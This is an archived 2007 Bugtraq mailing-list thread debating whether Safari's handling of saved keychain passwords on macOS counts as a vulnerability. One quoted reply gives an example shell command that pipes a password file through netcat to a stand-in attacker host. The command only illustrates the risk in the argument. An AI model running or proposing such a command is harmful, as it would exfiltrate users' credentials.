lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Sat, 19 May 2007 01:43:23 +0200
From: poplix <poplix@...uasia.org>
To: Kevin Finisterre (lists) <kf_lists@...italmunition.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: Apple Safari on MacOSX may reveal user's saved passwords

how should safari be able to read keychain items of other apps? it  
should be possible to use applescripts to make other apps to reveal  
passwords, SystemUIServer,for example, can read wep so it could  
reveal it...

-p


On 18 May 2007, at 7:13 PM, Kevin Finisterre (lists) wrote:

> Make this javascript for Safari show me the saved key for another  
> application (Like a stored WEP key) and I'll be impressed.
>
> -KF
>
> On May 18, 2007, at 9:23 AM, poplix wrote:
>
>> On 17 May 2007, at 7:50 PM, graham.coles@...-logic-group.com wrote:
>>
>>> It is also why I don't leave my machine logged in and accessible  
>>> to other
>>> users, which appears to be the whole basis of this 'vulnerability'.
>>
>> this is NOT the basis of the vulnerability. The point is that  
>> normally a malicious applications running as a nonroot  are not  
>> able to read keychained passwords.
>> In this case to steal passwords is sufficent to entice the victim  
>> to execute a malicious script, that normally it's not enough since  
>> keychain refuses access to untrusted applications.
>> This issue exposes keychained password as those are saved in a  
>> text file: an inexperienced user can loose his password by  
>> executing an untrusted malicious shell script (ie "cat /home/pop/ 
>> pass | nc steal.com 666")
>>
>>
>>
>>>
>>> The whole concept of the keychain, however, is to restrict access  
>>> to its
>>> contents to the owner. If you can happily log in as the owner,  
>>> then you
>>> have everything they can access, INCLUDING the keychain. If they  
>>> can't do
>>> this, you just have some encrypted data. You don't HAVE to store web
>>> passwords, of course.
>>
>> keychain asks for password when the owner wants to see his data  
>> and having access to a computer doesn't mean that you have the  
>> login password too
>>
>>
>>> If you are sitting at the machine of a person who has left it  
>>> logged in
>>> and they use this feature, then whatever web browser you are  
>>> using will
>>> believe you are that person and provide access to the website
>>> automatically--you don't need to see the password to use it.
>>
>> and what if you gain a 5 minutes access to a laptop in the middle  
>> of the desert where internet connection is missing . . .
>>
>>
>>>
>>> I'd like to know what Apple were supposed to do to fix this?
>>
>> i think it's sufficent to untrust the injected code....
>>
>>
>>>
>>> It is, after all, YOUR keychain with YOUR passwords that YOU want
>>> applications to recover when YOU are logged in. Why shouldn't YOU  
>>> be able
>>> to access it. If you don't want to use it don't, but if someone  
>>> has to be
>>> logged in as you to read it, that sounds about right.
>>
>> right?? it's like having passwords saved in a text file and 'chmod  
>> 700' it
>>
>>
>>>
>>>>> Someone has *ROOT* access to your system REMOTELY over ssh and  
>>>>> you're
>>>>> worried that they might be able to retrieve a password from your
>>> keychain.
>>
>> rooting a computer is really not the point, it' quite obvious that  
>> "rooted comp" => "TOTAL compromise"
>>
>>
>>
>> Let me make a question: what if safari makes loaded password part  
>> of the html so it's shown when clicking "view page source" ..??  
>> should it be considered a vulnerability??
>>
>>
>> cheers,
>> -poplix
>>
>>
>>
>>
>>
>>
>>
>>>
>>>> Yes, it would be annoying if someone rooted my laptop.  It would  
>>>> be a
>>>> lot more annoying if they not only rooted my laptop but also  
>>>> cleaned out
>>>> my bank account via my browser.
>>>
>>> 'Annoying' is the understatement of the millennium.
>>>
>>> As far as root access goes, see my comments above regarding key  
>>> loggers?
>>>
>>> With root access they will have your gpg file, they will know what
>>> processes are running (they will know when you run gpg) and they can
>>> capture your keystrokes. Is this then a vulnerability of gpg? So  
>>> much for
>>> keeping your online banking safe. Even if you memorize the  
>>> passwords, they
>>> can still see your keypresses and thereofre empty your bank account.
>>>
>>> If someone roots your machine, security is non-existant and trust  
>>> beyond
>>> repair. Don't trivialize this by comparing it to a 'might be able  
>>> to see
>>> your web passwords' issue, this is disaster incarnate and game  
>>> over all
>>> rolled into one!
>>
>>>
>>>> It *is* somewhat disturbing that root can so trivially interfere  
>>>> with
>>>> the guts of someone else's processes.  Normally, root has to do  
>>>> a lot of
>>>> work to do that.
>>>
>>> With great power comes great responsibility, which is precisely  
>>> why Macs
>>> have the root login disabled and require a user designated as
>>> 'Administrator' to authenticate themself whenever system files are
>>> modified or installed. Other users are created as non- 
>>> administrator and
>>> remote login is blocked by the firewall. The chances of anyone  
>>> actually
>>> logging in remotely as root on a normal Mac are zero as you, while
>>> administrator, would have to specifically enable all of this.  
>>> This is why
>>> Apple warn you not to do it.
>>>
>>>>>>  a different non-root user on the console can do it too
>>>>> Which again restricts this vunerability (as previously  
>>>>> mentioned) to
>>> an
>>>>> attacker who happens to be sitting in front of your machine(!)
>>>
>>>> Did you read the bit where I speculated about setuid applications?
>>>
>>> Yes, but again if you can get this far you either have the person's
>>> identity or root access (bad or hopeless situation respectively).  
>>> Why
>>> worry incessantly about things that you stored in the keychain being
>>> accessed when someone can access everything you own.
>>>
>>> Should the keychain refuse to divulge its contents to a person
>>> authenticated as the owner?
>>>
>>> Is the answer to remove the keychain and watch as people revert  
>>> to storing
>>> their passwords unencrypted in stickies, or text files on their  
>>> desktop?
>>>
>>> You normally have to come up with a feasible attack vector for  
>>> something
>>> to be a vulnerability, this seems far too early to be notifying the
>>> vendor.
>>>
>>> Saving passwords on any web browser is a lousy idea from a security
>>> perspective. However, people don't like security, they like  
>>> convenience.
>>> The only real fix here is perhaps a disclaimer message advising  
>>> people not
>>> to store important passwords for websites in the browser in the  
>>> first
>>> place. But lets face reality, even if the did would it stop  
>>> people doing
>>> it?
>>>
>>
>>
>>
>>
>>
>>>> --
>>>> David Cantrell
>>>
>>> --
>>> Graham Coles
>>>
>>>
>>>
>>> The Logic Group Enterprises Limited
>>> Logic House, Waterfront Business Park, Fleet Road, Fleet,  
>>> Hampshire, GU51 3SB, UK
>>> Registered in England. Registered No. 2609323
>>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ